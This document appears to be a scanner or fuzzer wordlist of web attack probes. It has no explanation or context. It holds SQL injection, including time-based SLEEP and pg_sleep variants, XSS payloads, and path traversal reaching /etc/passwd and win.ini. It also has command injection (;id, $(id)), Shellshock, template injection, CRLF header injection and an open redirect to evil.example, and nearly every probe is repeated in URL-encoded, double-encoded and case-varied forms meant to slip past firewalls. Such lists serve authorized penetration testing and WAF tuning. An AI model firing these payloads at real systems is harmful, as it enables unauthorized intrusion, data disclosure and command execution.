' OR '1'='1 --
<script>alert(1)</script>
../../../../etc/passwd
;id
%3Cscript%3Ealert(1)%3C/script%3E
test
baseline
AUROSE_PROBE
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%27%20OR%20%271%27%3D%271%20--
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
..%2F..%2F..%2F..%2Fetc%2Fpasswd
%3Bid
%253Cscript%253Ealert%281%29%253C%2Fscript%253E
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
<SCRIPT>ALERT(1)</SCRIPT>
../../../../ETC/PASSWD
;ID
%3CSCRIPT%3EALERT(1)%3C/SCRIPT%3E
TEST
BASELINE
..\..\..\..\WINDOWS\WIN.INI
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
..%2F..%2F..%2F..%2FETC%2FPASSWD
%3BID
%253CSCRIPT%253EALERT%281%29%253C%2FSCRIPT%253E
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1 --
' OR '1'%3D'1
" OR "1"%3D"1
' OR '1'='1 --?v=0
' OR '1'='1 --&v=0
%27%20OR%20%271%27%3D%271%20--_0
waf_0
/waf/0
' OR '1'='1 --%0a0
<script>alert(1)</script>?v=1
<script>alert(1)</script>&v=1
%3Cscript%3Ealert%281%29%3C%2Fscript%3E_1
waf_1
/waf/1
<script>alert(1)</script>%0a1
../../../../etc/passwd?v=2
../../../../etc/passwd&v=2
..%2F..%2F..%2F..%2Fetc%2Fpasswd_2
waf_2
/waf/2
../../../../etc/passwd%0a2
;id?v=3
;id&v=3
%3Bid_3
waf_3
/waf/3
;id%0a3
%3Cscript%3Ealert(1)%3C/script%3E?v=4
%3Cscript%3Ealert(1)%3C/script%3E&v=4
%253Cscript%253Ealert%281%29%253C%2Fscript%253E_4
waf_4
/waf/4
' OR 1=1 -- wafcheck
%27%20OR%201%3D1%20--%20wafcheck
%2527%2520OR%25201%253D1%2520--%2520wafcheck
'/**/OR/**/1=1/**/--/**/wafcheck
' OR 1%3d1 -- wafcheck
' OR 1=1 -- WAFCHECK
' OR 1=1 -- wafcheck?aurose=1
' OR 1=1 -- wafcheck&aurose=1
<script>alert(1)</script>waf
%3Cscript%3Ealert%281%29%3C%2Fscript%3Ewaf
%253Cscript%253Ealert%25281%2529%253C%252Fscript%253Ewaf
<SCRIPT>ALERT(1)</SCRIPT>WAF
<script>alert(1)</script>waf?aurose=1
<script>alert(1)</script>waf&aurose=1
../../etc/passwd?waf=1
..%2F..%2Fetc%2Fpasswd%3Fwaf%3D1
..%252F..%252Fetc%252Fpasswd%253Fwaf%253D1
../../etc/passwd?waf%3d1
../../ETC/PASSWD?WAF=1
../../etc/passwd?waf=1?aurose=1
../../etc/passwd?waf=1&aurose=1
union select 1,2,3 -- waf
union%20select%201%2C2%2C3%20--%20waf
union%2520select%25201%252C2%252C3%2520--%2520waf
union/**/select/**/1,2,3/**/--/**/waf
UNION SELECT 1,2,3 -- WAF
union select 1,2,3 -- waf?aurose=1
union select 1,2,3 -- waf&aurose=1
() { :;}; echo shellshock
%28%29%20%7B%20%3A%3B%7D%3B%20echo%20shellshock
%2528%2529%2520%257B%2520%253A%253B%257D%253B%2520echo%2520shellshock
()/**/{/**/:;};/**/echo/**/shellshock
() { :;}; ECHO SHELLSHOCK
() { :;}; echo shellshock?aurose=1
() { :;}; echo shellshock&aurose=1
%3Csvg/onload=alert(1)%3Ewaf
%253Csvg%2Fonload%3Dalert%281%29%253Ewaf
%25253Csvg%252Fonload%253Dalert%25281%2529%25253Ewaf
%3Csvg/onload%3dalert(1)%3Ewaf
%3CSVG/ONLOAD=ALERT(1)%3EWAF
%3Csvg/onload=alert(1)%3Ewaf?aurose=1
%3Csvg/onload=alert(1)%3Ewaf&aurose=1
SLEEP(3)--waf
SLEEP%283%29--waf
SLEEP%25283%2529--waf
SLEEP(3)--WAF
SLEEP(3)--waf?aurose=1
SLEEP(3)--waf&aurose=1
/*!50000UNION*/ /*!50000SELECT*/ 1,2,3
%2F%2A%2150000UNION%2A%2F%20%2F%2A%2150000SELECT%2A%2F%201%2C2%2C3
%252F%252A%252150000UNION%252A%252F%2520%252F%252A%252150000SELECT%252A%252F%25201%252C2%252C3
/*!50000UNION*//**//*!50000SELECT*//**/1,2,3
/*!50000UNION*/ /*!50000SELECT*/ 1,2,3?aurose=1
/*!50000UNION*/ /*!50000SELECT*/ 1,2,3&aurose=1
/*!50000UNION*/ /*!50000SELECT*/ 1,2,3.bak
/*!50000UNION*/ /*!50000SELECT*/ 1,2,3.old
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
' OR 1=1 -- wafcheck::var0
%27%20OR%201%3D1%20--%20wafcheck::v0
/waf/probe/0
<script>alert(1)</script>waf::var1
%3Cscript%3Ealert%281%29%3C%2Fscript%3Ewaf::v1
/waf/probe/1
../../etc/passwd?waf=1::var2
..%2F..%2Fetc%2Fpasswd%3Fwaf%3D1::v2
/waf/probe/2
union select 1,2,3 -- waf::var3
union%20select%201%2C2%2C3%20--%20waf::v3
/waf/probe/3
() { :;}; echo shellshock::var4
%28%29%20%7B%20%3A%3B%7D%3B%20echo%20shellshock::v4
/waf/probe/4
%3Csvg/onload=alert(1)%3Ewaf::var5
%253Csvg%2Fonload%3Dalert%281%29%253Ewaf::v5
/waf/probe/5
SLEEP(3)--waf::var6
SLEEP%283%29--waf::v6
/waf/probe/6
/*!50000UNION*/ /*!50000SELECT*/ 1,2,3::var7
%2F%2A%2150000UNION%2A%2F%20%2F%2A%2150000SELECT%2A%2F%201%2C2%2C3::v7
/waf/probe/7
' OR '1'='1::var8
%27%20OR%20%271%27%3D%271::v8
/waf/probe/8
